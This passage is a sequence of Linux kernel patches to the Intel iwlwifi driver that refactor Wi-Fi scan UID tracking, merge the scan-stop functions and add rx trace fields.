iwl_mvm_scan_params *params, + int type) { struct iwl_scan_req_umac *cmd = mvm->scan_cmd; struct iwl_scan_req_umac_tail *sec_part = (void *)&cmd->data + sizeof(struct iwl_scan_channel_cfg_umac) * mvm->fw->ucode_capa.n_scan_channels; - u32 uid; + int uid; u32 ssid_bitmap = 0; int n_iterations = iwl_mvm_scan_total_iterations(params); - int uid_idx; lockdep_assert_held(&mvm->mutex); - uid_idx = iwl_mvm_find_free_scan_uid(mvm); - if (uid_idx >= mvm->max_scans) - return -EBUSY; + uid = iwl_mvm_scan_uid_by_status(mvm, 0); + if (uid < 0) + return uid; memset(cmd, 0, ksize(cmd)); cmd->hdr.size = cpu_to_le16(iwl_mvm_scan_size(mvm) - @@ -1169,14 +1119,9 @@ static int iwl_mvm_scan_umac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, iwl_mvm_scan_umac_dwell(mvm, cmd, params); - if (n_iterations == 1) - uid = iwl_generate_scan_uid(mvm, IWL_MVM_SCAN_REGULAR); - else - uid = iwl_generate_scan_uid(mvm, IWL_MVM_SCAN_SCHED); + mvm->scan_uid_status[uid] = type; - mvm->scan_uid[uid_idx] = uid; cmd->uid = cpu_to_le32(uid); - cmd->general_flags = cpu_to_le32(iwl_mvm_scan_umac_flags(mvm, params)); if (iwl_mvm_scan_use_ebs(mvm, n_iterations)) @@ -1308,7 +1253,8 @@ int iwl_mvm_reg_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { hcmd.id = SCAN_REQ_UMAC; - ret = iwl_mvm_scan_umac(mvm, vif, ¶ms); + ret = iwl_mvm_scan_umac(mvm, vif, ¶ms, + IWL_MVM_SCAN_REGULAR); } else { hcmd.id = SCAN_OFFLOAD_REQUEST_CMD; ret = iwl_mvm_scan_lmac(mvm, vif, ¶ms); @@ -1415,7 +1361,7 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { hcmd.id = SCAN_REQ_UMAC; - ret = iwl_mvm_scan_umac(mvm, vif, ¶ms); + ret = iwl_mvm_scan_umac(mvm, vif, ¶ms, IWL_MVM_SCAN_SCHED); } else { hcmd.id = SCAN_OFFLOAD_REQUEST_CMD; ret = iwl_mvm_scan_lmac(mvm, vif, ¶ms); @@ -1447,13 +1393,10 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_umac_scan_complete *notif = (void *)pkt->data; u32 uid = __le32_to_cpu(notif->uid); - bool sched = !!(uid & IWL_MVM_SCAN_SCHED); - int uid_idx = iwl_mvm_find_scan_uid(mvm, uid); + bool sched = (mvm->scan_uid_status[uid] == IWL_MVM_SCAN_SCHED); - /* - * Scan uid may be set to zero in case of scan abort request from above. - */ - if (uid_idx >= mvm->max_scans) + /* the status may be already zero in case of scan abort from above */ + if (mvm->scan_uid_status[uid] == 0) return 0; IWL_DEBUG_SCAN(mvm, @@ -1467,14 +1410,14 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, if (notif->ebs_status) mvm->last_ebs_successful = false; - mvm->scan_uid[uid_idx] = 0; + mvm->scan_uid_status[uid] = 0; if (!sched) { ieee80211_scan_completed(mvm->hw, notif->status == IWL_SCAN_OFFLOAD_ABORTED); iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - } else if (!iwl_mvm_find_scan_type(mvm, IWL_MVM_SCAN_SCHED)) { + } else if (iwl_mvm_scan_uid_by_status(mvm, IWL_MVM_SCAN_SCHED) < 0) { ieee80211_sched_scan_stopped(mvm->hw); } else { IWL_DEBUG_SCAN(mvm, "Another sched scan is running\n"); @@ -1506,12 +1449,11 @@ static bool iwl_scan_umac_done_check(struct iwl_notif_wait_data *notif_wait, struct iwl_umac_scan_done *scan_done = data; struct iwl_umac_scan_complete *notif = (void *)pkt->data; u32 uid = __le32_to_cpu(notif->uid); - int uid_idx = iwl_mvm_find_scan_uid(scan_done->mvm, uid); if (WARN_ON(pkt->hdr.cmd != SCAN_COMPLETE_UMAC)) return false; - if (uid_idx >= scan_done->mvm->max_scans) + if (scan_done->mvm->scan_uid_status[uid] == 0) return false; /* @@ -1519,12 +1461,12 @@ static bool iwl_scan_umac_done_check(struct iwl_notif_wait_data *notif_wait, * in FW so the RX handler does nothing. Set last_ebs_successful here if * needed. */ - scan_done->mvm->scan_uid[uid_idx] = 0; + scan_done->mvm->scan_uid_status[uid] = 0; if (notif->ebs_status) scan_done->mvm->last_ebs_successful = false; - return !iwl_mvm_find_scan_type(scan_done->mvm, scan_done->type); + return iwl_mvm_scan_uid_by_status(scan_done->mvm, scan_done->type) < 0; } static int iwl_umac_scan_abort_one(struct iwl_mvm *mvm, u32 uid) @@ -1560,10 +1502,10 @@ static int iwl_mvm_umac_scan_stop(struct iwl_mvm *mvm, int type) IWL_DEBUG_SCAN(mvm, "Preparing to stop scan, type %x\n", type); for (i = 0; i < mvm->max_scans; i++) { - if (mvm->scan_uid[i] & type) { + if (mvm->scan_uid_status[i] == type) { int err; - err = iwl_umac_scan_abort_one(mvm, mvm->scan_uid[i]); + err = iwl_umac_scan_abort_one(mvm, i); if (!err) ret = 0; } @@ -1601,17 +1543,17 @@ int iwl_mvm_scan_size(struct iwl_mvm *mvm) void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) { if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { - u32 uid, i; + int uid, i; - uid = iwl_mvm_find_first_scan(mvm, IWL_MVM_SCAN_REGULAR); - if (uid < mvm->max_scans) { + uid = iwl_mvm_scan_uid_by_status(mvm, IWL_MVM_SCAN_REGULAR); + if (uid >= 0) { ieee80211_scan_completed(mvm->hw, true); - mvm->scan_uid[uid] = 0; + mvm->scan_uid_status[uid] = 0; } - uid = iwl_mvm_find_first_scan(mvm, IWL_MVM_SCAN_SCHED); - if (uid < mvm->max_scans && !mvm->restart_fw) { + uid = iwl_mvm_scan_uid_by_status(mvm, IWL_MVM_SCAN_SCHED); + if (uid >= 0 && !mvm->restart_fw) { ieee80211_sched_scan_stopped(mvm->hw); - mvm->scan_uid[uid] = 0; + mvm->scan_uid_status[uid] = 0; } /* We shouldn't have any UIDs still set. Loop over all the @@ -1619,10 +1561,10 @@ void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) * any is found. */ for (i = 0; i < mvm->max_scans; i++) { - if (WARN_ONCE(mvm->scan_uid[i], - "UMAC scan UID %d was not cleaned\n", - mvm->scan_uid[i])) - mvm->scan_uid[i] = 0; + if (WARN_ONCE(mvm->scan_uid_status[i], + "UMAC scan UID %d status was not cleaned\n", + i)) + mvm->scan_uid_status[i] = 0; } } else { if (mvm->scan_status & IWL_MVM_SCAN_REGULAR) From 434f3c1bd5571b54e6684194fcb9fd78641fcc78 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 14:41:44 +0300 Subject: [PATCH 387/872] iwlwifi: mvm: remove code that stops multiple UMAC scans of a type We can only have one scan per type at the same time, so the code that tries to stop several scans of a type is unnecessary. Remove that to reduce code complexity. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 74 +++++++------------------ 1 file changed, 21 insertions(+), 53 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 496d1dfe4f7b..4199c602b7cd 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -898,13 +898,6 @@ static int iwl_mvm_scan_lmac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, return 0; } -/* UMAC scan API */ - -struct iwl_umac_scan_done { - struct iwl_mvm *mvm; - int type; -}; - static int rate_to_scan_rate_flag(unsigned int rate) { static const int rate_to_scan_rate[IWL_RATE_COUNT] = { @@ -1443,76 +1436,51 @@ int iwl_mvm_rx_umac_scan_iter_complete_notif(struct iwl_mvm *mvm, return 0; } -static bool iwl_scan_umac_done_check(struct iwl_notif_wait_data *notif_wait, - struct iwl_rx_packet *pkt, void *data) -{ - struct iwl_umac_scan_done *scan_done = data; - struct iwl_umac_scan_complete *notif = (void *)pkt->data; - u32 uid = __le32_to_cpu(notif->uid); - - if (WARN_ON(pkt->hdr.cmd != SCAN_COMPLETE_UMAC)) - return false; - - if (scan_done->mvm->scan_uid_status[uid] == 0) - return false; - - /* - * Clear scan uid of scans that was aborted from above and completed - * in FW so the RX handler does nothing. Set last_ebs_successful here if - * needed. - */ - scan_done->mvm->scan_uid_status[uid] = 0; - - if (notif->ebs_status) - scan_done->mvm->last_ebs_successful = false; - - return iwl_mvm_scan_uid_by_status(scan_done->mvm, scan_done->type) < 0; -} - -static int iwl_umac_scan_abort_one(struct iwl_mvm *mvm, u32 uid) +static int iwl_mvm_umac_scan_abort(struct iwl_mvm *mvm, int type) { struct iwl_umac_scan_abort cmd = { .hdr.size = cpu_to_le16(sizeof(struct iwl_umac_scan_abort) - sizeof(struct iwl_mvm_umac_cmd_hdr)), - .uid = cpu_to_le32(uid), }; + int uid, ret; lockdep_assert_held(&mvm->mutex); + /* We should always get a valid index here, because we already + * checked that this type of scan was running in the generic + * code. + */ + uid = iwl_mvm_scan_uid_by_status(mvm, type); + if (WARN_ON_ONCE(uid < 0)) + return uid; + + cmd.uid = cpu_to_le32(uid); + IWL_DEBUG_SCAN(mvm, "Sending scan abort, uid %u\n", uid); - return iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); + ret = iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); + if (!ret) + mvm->scan_uid_status[uid] = 0; + + return ret; } static int iwl_mvm_umac_scan_stop(struct iwl_mvm *mvm, int type) { struct iwl_notification_wait wait_scan_done; static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, }; - struct iwl_umac_scan_done scan_done = { - .mvm = mvm, - .type = type, - }; - int i, ret = -EIO; + int ret; iwl_init_notification_wait(&mvm->notif_wait, &wait_scan_done, scan_done_notif, ARRAY_SIZE(scan_done_notif), - iwl_scan_umac_done_check, &scan_done); + NULL, NULL); IWL_DEBUG_SCAN(mvm, "Preparing to stop scan, type %x\n", type); - for (i = 0; i < mvm->max_scans; i++) { - if (mvm->scan_uid_status[i] == type) { - int err; - - err = iwl_umac_scan_abort_one(mvm, i); - if (!err) - ret = 0; - } - } - + ret = iwl_mvm_umac_scan_abort(mvm, type); if (ret) { - IWL_DEBUG_SCAN(mvm, "Couldn't stop scan\n"); + IWL_DEBUG_SCAN(mvm, "couldn't stop scan type %d\n", type); iwl_remove_notification(&mvm->notif_wait, &wait_scan_done); return ret; } From f2461796af656f7d1b385f8025c81409dfec8a2f Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 15:23:19 +0300 Subject: [PATCH 388/872] iwlwifi: mvm: combine UMAC and LMAC scan_stop functions The UMAC and LMAC scan_stop functions are now nearly identical, so they can be combined into a single function instead. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 57 ++++++------------------- 1 file changed, 13 insertions(+), 44 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 4199c602b7cd..49bcf7d56d49 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -557,7 +557,7 @@ static bool iwl_mvm_scan_pass_all(struct iwl_mvm *mvm, return true; } -static int iwl_mvm_send_lmac_scan_abort(struct iwl_mvm *mvm) +static int iwl_mvm_lmac_scan_abort(struct iwl_mvm *mvm) { int ret; struct iwl_host_cmd cmd = { @@ -584,36 +584,6 @@ static int iwl_mvm_send_lmac_scan_abort(struct iwl_mvm *mvm) return ret; } -static int iwl_mvm_lmac_scan_stop(struct iwl_mvm *mvm, int type) -{ - int ret; - struct iwl_notification_wait wait_scan_done; - static const u8 scan_done_notif[] = { SCAN_OFFLOAD_COMPLETE, }; - bool sched = type & IWL_MVM_SCAN_SCHED; - - lockdep_assert_held(&mvm->mutex); - - iwl_init_notification_wait(&mvm->notif_wait, &wait_scan_done, - scan_done_notif, - ARRAY_SIZE(scan_done_notif), - NULL, NULL); - - ret = iwl_mvm_send_lmac_scan_abort(mvm); - if (ret) { - IWL_DEBUG_SCAN(mvm, "Send stop %sscan failed %d\n", - sched ? "offloaded " : "", ret); - iwl_remove_notification(&mvm->notif_wait, &wait_scan_done); - goto out; - } - - IWL_DEBUG_SCAN(mvm, "Successfully sent stop %sscan\n", - sched ? "scheduled " : ""); - - ret = iwl_wait_notification(&mvm->notif_wait, &wait_scan_done, 1 * HZ); -out: - return ret; -} - static void iwl_mvm_scan_fill_tx_cmd(struct iwl_mvm *mvm, struct iwl_scan_req_tx_cmd *tx_cmd, bool no_cck) @@ -1465,12 +1435,15 @@ static int iwl_mvm_umac_scan_abort(struct iwl_mvm *mvm, int type) return ret; } -static int iwl_mvm_umac_scan_stop(struct iwl_mvm *mvm, int type) +static int iwl_mvm_scan_stop_wait(struct iwl_mvm *mvm, int type) { struct iwl_notification_wait wait_scan_done; - static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, }; + static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, + SCAN_OFFLOAD_COMPLETE, }; int ret; + lockdep_assert_held(&mvm->mutex); + iwl_init_notification_wait(&mvm->notif_wait, &wait_scan_done, scan_done_notif, ARRAY_SIZE(scan_done_notif), @@ -1478,7 +1451,11 @@ static int iwl_mvm_umac_scan_stop(struct iwl_mvm *mvm, int type) IWL_DEBUG_SCAN(mvm, "Preparing to stop scan, type %x\n", type); - ret = iwl_mvm_umac_scan_abort(mvm, type); + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + ret = iwl_mvm_umac_scan_abort(mvm, type); + else + ret = iwl_mvm_lmac_scan_abort(mvm); + if (ret) { IWL_DEBUG_SCAN(mvm, "couldn't stop scan type %d\n", type); iwl_remove_notification(&mvm->notif_wait, &wait_scan_done); @@ -1559,11 +1536,7 @@ int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) goto out; } - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - ret = iwl_mvm_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); - else - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); - + ret = iwl_mvm_scan_stop_wait(mvm, IWL_MVM_SCAN_REGULAR); if (!ret) mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; out: @@ -1593,11 +1566,7 @@ int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) goto out; } - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - ret = iwl_mvm_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); - else - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); - + ret = iwl_mvm_scan_stop_wait(mvm, IWL_MVM_SCAN_SCHED); if (!ret) mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; out: From 7ccc72410d34911537ddd0a502b4a04472e6e6af Mon Sep 17 00:00:00 2001 From: Avri Altman Date: Thu, 14 May 2015 07:55:32 +0300 Subject: [PATCH 389/872] iwlwifi: pcie: Remove redundant check for family type This check for family type is redundant as the if clause above checks a family-dependent Boolean (which is not set for family 8000 anyway). Signed-off-by: Avri Altman Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/pcie/tx.c | 2 -- 1 file changed, 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/tx.c b/drivers/net/wireless/iwlwifi/pcie/tx.c index 06952aadfd7b..2b06f9933b20 100644 --- a/drivers/net/wireless/iwlwifi/pcie/tx.c +++ b/drivers/net/wireless/iwlwifi/pcie/tx.c @@ -1053,8 +1053,6 @@ static int iwl_pcie_set_cmd_in_flight(struct iwl_trans *trans, if (trans->cfg->base_params->apmg_wake_up_wa) { __iwl_trans_pcie_set_bit(trans, CSR_GP_CNTRL, CSR_GP_CNTRL_REG_FLAG_MAC_ACCESS_REQ); - if (trans->cfg->device_family == IWL_DEVICE_FAMILY_8000) - udelay(2); ret = iwl_poll_bit(trans, CSR_GP_CNTRL, CSR_GP_CNTRL_REG_VAL_MAC_ACCESS_EN, From 65f4a8e0a8ebfc0b4a3ed29394c578e4818021ba Mon Sep 17 00:00:00 2001 From: Eliad Peller Date: Mon, 11 May 2015 15:51:22 +0300 Subject: [PATCH 390/872] iwlwifi: tracing: add rx cmd header fields Having explicit rx cmd header fields is useful, as it can be used for event filtering (e.g. saving only debug logs, rather than the whole data) Signed-off-by: Eliad Peller Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- .../net/wireless/iwlwifi/iwl-devtrace-iwlwifi.h | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-devtrace-iwlwifi.h b/drivers/net/wireless/iwlwifi/iwl-devtrace-iwlwifi.h index 223b8752f924..948ce0802fa7 100644 --- a/drivers/net/wireless/iwlwifi/iwl-devtrace-iwlwifi.h +++ b/drivers/net/wireless/iwlwifi/iwl-devtrace-iwlwifi.h @@ -1,6 +1,7 @@ /****************************************************************************** * * Copyright(c) 2009 - 2014 Intel Corporation. All rights reserved. + * Copyright(c) 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify it * under the terms of version 2 of the GNU General Public License as @@ -64,19 +65,21 @@ TRACE_EVENT(iwlwifi_dev_hcmd, TRACE_EVENT(iwlwifi_dev_rx, TP_PROTO(const struct device *dev, const struct iwl_trans *trans, - void *rxbuf, size_t len), - TP_ARGS(dev, trans, rxbuf, len), + struct iwl_rx_packet *pkt, size_t len), + TP_ARGS(dev, trans, pkt, len), TP_STRUCT__entry( DEV_ENTRY - __dynamic_array(u8, rxbuf, iwl_rx_trace_len(trans, rxbuf, len)) + __field(u8, cmd) + __dynamic_array(u8, rxbuf, iwl_rx_trace_len(trans, pkt, len)) ), TP_fast_assign( DEV_ASSIGN; - memcpy(__get_dynamic_array(rxbuf), rxbuf, - iwl_rx_trace_len(trans, rxbuf, len)); + __entry->cmd = pkt->hdr.cmd; + memcpy(__get_dynamic_array(rxbuf), pkt, + iwl_rx_trace_len(trans, pkt, len)); ), TP_printk("[%s] RX cmd %#.2x", - __get_str(dev), ((u8 *)__get_dynamic_array(rxbuf))[4]) + __get_str(dev), __entry->cmd) ); TRACE_EVENT(iwlwifi_dev_tx, From c7d42480d799ab3242103427f2619b419d885f5e Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 16:00:26 +0300 Subject: [PATCH 391/872] iwlwifi: mvm: combine regular and sched scan stop functions The regular and scheduled scan functions are very similar, so they can be combined into one. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 2 +- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 7 +-- drivers/net/wireless/iwlwifi/mvm/mvm.h | 9 ++-- drivers/net/wireless/iwlwifi/mvm/scan.c | 50 +++++++-------------- 4 files changed, 27 insertions(+), 41 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index ceffc78ff15b..423c519f06bc 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -761,7 +761,7 @@ void iwl_mvm_set_last_nonqos_seq(struct iwl_mvm *mvm, struct ieee80211_vif *vif) static int iwl_mvm_switch_to_d3(struct iwl_mvm *mvm) { - iwl_mvm_reg_scan_stop(mvm); + iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); iwl_trans_stop_device(mvm->trans); diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index cea236b6c2ed..d3af88bcff80 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -510,6 +510,7 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) hw->wiphy->max_scan_ssids = PROBE_OPTION_MAX; + BUILD_BUG_ON(IWL_MVM_SCAN_STOPPING_MASK & IWL_MVM_SCAN_MASK); BUILD_BUG_ON(IWL_MVM_MAX_UMAC_SCANS > HWEIGHT32(IWL_MVM_SCAN_MASK) || IWL_MVM_MAX_LMAC_SCANS > HWEIGHT32(IWL_MVM_SCAN_MASK)); @@ -2361,7 +2362,7 @@ static void iwl_mvm_bss_info_changed(struct ieee80211_hw *hw, mutex_lock(&mvm->mutex); if (changes & BSS_CHANGED_IDLE && !bss_conf->idle) - iwl_mvm_sched_scan_stop(mvm, true); + iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_SCHED, true); switch (vif->type) { case NL80211_IFTYPE_STATION: @@ -2417,7 +2418,7 @@ static void iwl_mvm_mac_cancel_hw_scan(struct ieee80211_hw *hw, */ if ((mvm->scan_status & IWL_MVM_SCAN_REGULAR) || (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN)) - iwl_mvm_reg_scan_stop(mvm); + iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); mutex_unlock(&mvm->mutex); } @@ -2775,7 +2776,7 @@ static int iwl_mvm_mac_sched_scan_stop(struct ieee80211_hw *hw, return 0; } - ret = iwl_mvm_sched_scan_stop(mvm, false); + ret = iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_SCHED, false); mutex_unlock(&mvm->mutex); iwl_mvm_wait_for_async_handlers(mvm); diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index f22d30988c96..0173ad15ed46 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -447,6 +447,8 @@ iwl_mvm_vif_from_mac80211(struct ieee80211_vif *vif) extern const u8 tid_to_mac80211_ac[]; +#define IWL_MVM_SCAN_STOPPING_SHIFT 8 + enum iwl_scan_status { IWL_MVM_SCAN_REGULAR = BIT(0), IWL_MVM_SCAN_SCHED = BIT(1), @@ -463,8 +465,8 @@ enum iwl_scan_status { IWL_MVM_SCAN_NETDETECT_MASK = IWL_MVM_SCAN_NETDETECT | IWL_MVM_SCAN_STOPPING_NETDETECT, - IWL_MVM_SCAN_STOPPING_MASK = 0xff00, - IWL_MVM_SCAN_MASK = 0x00ff, + IWL_MVM_SCAN_STOPPING_MASK = 0xff << IWL_MVM_SCAN_STOPPING_SHIFT, + IWL_MVM_SCAN_MASK = 0xff, }; /** @@ -1121,7 +1123,7 @@ int iwl_mvm_reg_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, struct cfg80211_scan_request *req, struct ieee80211_scan_ies *ies); int iwl_mvm_scan_size(struct iwl_mvm *mvm); -int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm); +int iwl_mvm_scan_stop(struct iwl_mvm *mvm, int type, bool notify); int iwl_mvm_max_scan_ie_len(struct iwl_mvm *mvm); void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm); @@ -1137,7 +1139,6 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, struct cfg80211_sched_scan_request *req, struct ieee80211_scan_ies *ies, int type); -int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify); int iwl_mvm_rx_scan_match_found(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd); diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 49bcf7d56d49..d8de906d3ff2 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -1139,11 +1139,11 @@ static int iwl_mvm_check_running_scans(struct iwl_mvm *mvm, int type) case IWL_MVM_SCAN_REGULAR: if (mvm->scan_status & IWL_MVM_SCAN_REGULAR_MASK) return -EBUSY; - return iwl_mvm_sched_scan_stop(mvm, true); + return iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_SCHED, true); case IWL_MVM_SCAN_SCHED: if (mvm->scan_status & IWL_MVM_SCAN_SCHED_MASK) return -EBUSY; - return iwl_mvm_reg_scan_stop(mvm); + iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); case IWL_MVM_SCAN_NETDETECT: /* No need to stop anything for net-detect since the * firmware is restarted anyway. This way, any sched @@ -1524,11 +1524,11 @@ void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) } } -int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) +int iwl_mvm_scan_stop(struct iwl_mvm *mvm, int type, bool notify) { int ret; - if (!(mvm->scan_status & IWL_MVM_SCAN_REGULAR)) + if (!(mvm->scan_status & type)) return 0; if (iwl_mvm_is_radio_killed(mvm)) { @@ -1536,43 +1536,27 @@ int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) goto out; } - ret = iwl_mvm_scan_stop_wait(mvm, IWL_MVM_SCAN_REGULAR); + ret = iwl_mvm_scan_stop_wait(mvm, type); if (!ret) - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; + mvm->scan_status |= type << IWL_MVM_SCAN_STOPPING_SHIFT; out: /* Clear the scan status so the next scan requests will * succeed and mark the scan as stopping, so that the Rx * handler doesn't do anything, as the scan was stopped from - * above. Since the rx handler won't do anything now, we have - * to release the scan reference here. + * above. */ - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); + mvm->scan_status &= ~type; - mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; - ieee80211_scan_completed(mvm->hw, true); - - return ret; -} - -int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) -{ - int ret; - - if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) - return 0; - - if (iwl_mvm_is_radio_killed(mvm)) { - ret = 0; - goto out; - } - - ret = iwl_mvm_scan_stop_wait(mvm, IWL_MVM_SCAN_SCHED); - if (!ret) - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; -out: - mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; - if (notify) + if (type == IWL_MVM_SCAN_REGULAR) { + /* Since the rx handler won't do anything now, we have + * to release the scan reference here. + */ + iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); + if (notify) + ieee80211_scan_completed(mvm->hw, true); + } else if (notify) { ieee80211_sched_scan_stopped(mvm->hw); + } return ret; } From 8d14ccd878e52f8d1c60fa2f6f10b5921ee8f4f9 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 17:05:30 +0300 Subject: [PATCH 392/872] iwlwifi: mvm: make UMAC scans use the stopping scan status UMAC scans now use the general scan status for almost everything, the only part missing was in the scan complete notifications. Change it to use the stopping flags instead of clearing the flags when the stop comes from above and clean the handler function a bit. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 32 ++++++++++++------------- 1 file changed, 15 insertions(+), 17 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index d8de906d3ff2..4f4570d5261d 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -1356,15 +1356,24 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_umac_scan_complete *notif = (void *)pkt->data; u32 uid = __le32_to_cpu(notif->uid); - bool sched = (mvm->scan_uid_status[uid] == IWL_MVM_SCAN_SCHED); + bool aborted = (notif->status == IWL_SCAN_OFFLOAD_ABORTED); - /* the status may be already zero in case of scan abort from above */ - if (mvm->scan_uid_status[uid] == 0) + if (WARN_ON(!(mvm->scan_uid_status[uid] & mvm->scan_status))) return 0; + /* if the scan is already stopping, we don't need to notify mac80211 */ + if (mvm->scan_uid_status[uid] == IWL_MVM_SCAN_REGULAR) { + ieee80211_scan_completed(mvm->hw, aborted); + iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); + } else if (mvm->scan_uid_status[uid] == IWL_MVM_SCAN_SCHED) { + ieee80211_sched_scan_stopped(mvm->hw); + } + + mvm->scan_status &= ~mvm->scan_uid_status[uid]; + IWL_DEBUG_SCAN(mvm, - "Scan completed, uid %u type %s, status %s, EBS status %s\n", - uid, sched ? "sched" : "regular", + "Scan completed, uid %u type %u, status %s, EBS status %s\n", + uid, mvm->scan_uid_status[uid], notif->status == IWL_SCAN_OFFLOAD_COMPLETED ? "completed" : "aborted", notif->ebs_status == IWL_SCAN_EBS_SUCCESS ? @@ -1375,17 +1384,6 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct 